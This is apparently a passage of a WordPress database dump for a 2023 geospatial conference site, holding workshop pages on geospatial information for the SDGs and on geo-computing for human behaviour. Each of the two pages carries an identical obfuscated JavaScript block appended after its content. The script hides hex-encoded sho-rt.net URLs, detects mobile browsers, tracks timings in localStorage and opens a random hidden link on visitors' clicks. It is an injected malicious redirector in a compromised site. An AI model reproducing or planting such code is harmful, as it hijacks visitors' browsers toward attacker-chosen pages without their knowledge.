Mills, Newcastle University, UK<br />\n⦁ Petros Patias, Aristotle University, Greece<br />\n⦁ Daniele Oxoli, Politecnico di Milano<br />\n⦁ Shu Peng, National Geomatics Center of China, China<br />\n⦁ Aurélie Sand, Centre National d\'Etudes Spatiales, France<br />\n⦁ Hao Wu, National Geomatics Center of China, China<br />\n⦁ Alexander Zipf, Heidelberg University, Germany[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The Geospatial Information and SDG Nexus: GI4SDGs','','inherit','closed','closed','','2768-revision-v1','','','2023-02-05 14:04:20','2023-02-05 14:04:20','',2768,'https://gsw2023.com/?p=3819',0,'revision','',0),
(3820,1,'2023-02-05 14:06:18','2023-02-05 14:06:18','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2816\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours</span></strong></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Urban spaces have become complex, being shaped by diverse human behaviours. Therefore, the sustainability of development has faced various challenges ranging from pollution to equity in accessibility to activity spaces and opportunities. Using spatial big data and new computing technologies is an effective way to a better understanding of the interaction between individuals and urban environments, which would be beneficial to tackle urban challenges. This workshop focuses on new advanced technologies on spatial data representation and interoperability, geo-computation and -simulation, and GeoAI, which can harness human behaviour related spatial big data, discovering the mechanisms of the interaction between human behaviours and urban environments.</strong></h5>\n<p>[/vc_column_text][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"49\"][vc_row_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5></h5>\n<h5><strong>Themes of event:</strong></h5>\n<ul>\n<li>Geo-computation and geo-simulation models for understanding human mobility patterns and underlying mechanisms of the interactions between human behaviours and urban environments</li>\n<li>Computational time geographical methods for modelling and representing human activity-travel behaviour</li>\n<li>Spatio-temporal data mining methods for uncovering human behaviour and its interactions with urban environments</li>\n<li>Knowledge-based geo-computation for reasoning human behaviour contexts</li>\n<li>GeoAI-based technique for sensing urban environments using spatio-temporal big data</li>\n<li>Computational methods for analysing individual and collective behaviour uncertainties within complex systems</li>\n<li>Reliability-based measures for quantifying accessibility under behavioural and environmental uncertainties</li>\n<li>Reliable geo-computation methods for optimizing activity-travel scheduling under uncertainties</li>\n<li>Conceptual models for human behaviour related spatial data representation and associated data such as time series.</li>\n<li>Use case of international standards to foster scalability and reusability of solutions for human mobility big data.</li>\n<li>New solutions for effective and meaningful spatial data integration for human activity pattern study</li>\n<li>Geo-visualization and spatial representation methods of spatio-temporal big data on human mobility</li>\n<li>New developments of strategies and automated computational approaches for handling geo-privacy and ethical issues involved in the analysis of and use of individuals’ spatial data</li>\n</ul>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><strong>Scientific Committee:</strong></h5>\n<ul>\n<li>Pawel Boguslawski, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Elisabetta Colucci, Politecnico di Torino, Italy</li>\n<li>Chen-Chieh Feng, National University of Singapore, Singapore</li>\n<li>Rui Zhu, Agency for Science, Technology and Research, Singapore</li>\n<li>James Haworth, University College London, UK</li>\n<li>Tao Jia, Wuhan University, China</li>\n<li>Xiao Li, University of Oxford, UK</li>\n<li>Chun Liu, Tongji University, China</li>\n<li>Xintao Liu, The Hong Kong Polytechnic University, China</li>\n<li>Francesca Noardo, Open Geospatial Consortium</li>\n<li>Azarakhsh Rafiee-Voermans, Delft University of Technology, Netherlands</li>\n<li>PWitold Rohm, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Shih-Lung Shaw, University of Tennessee, Knoxville, USA</li>\n<li>Katarzyna Sila-Nowicka, University of Auckland, New Zealand</li>\n<li>Noam Shoval, Hebrew University of Jerusalem, Israel</li>\n<li>Donggen Wang, The Hong Kong Baptist University, China</li>\n<li>Martin Werner, Technical University of Munich, Germany</li>\n<li>René Westerholt, Technical University of Dortmund, Germany</li>\n<li>Hangbin Wu, Tongji University, China</li>\n<li>Marco Minghini, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\n<ul>\n<li>WG IV/1: Spatial data representation and interoperability</li>\n<li>WG IV/3: Geo-computation and geo-simulation</li>\n<li>ICWG IV/III/II: Openness in Geospatial Science and Remote Sensing</li>\n<li>WG IV/6: Human Behaviour and Spatial Interactions</li>\n</ul>\n<p>&nbsp;</p>\n<h5></h5>\n<h5></h5>\n<h5><strong>Special Issue for the workshop:</strong></h5>\n<p>The authors of selected papers in the workshop will be invited to submit an extended full paper to the Transactions in GIS (<a href=\"https://onlinelibrary.wiley.com/journal/14679671\">https://onlinelibrary.wiley.com/journal/14679671</a>; current impact factor: 2.568). The selected papers will go through the peer-review process of the journal.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours','','inherit','closed','closed','','2791-revision-v1','','','2023-02-05 14:06:18','2023-02-05 14:06:18','',2791,'https://gsw2023.com/?p=3820',0,'revision','',0),
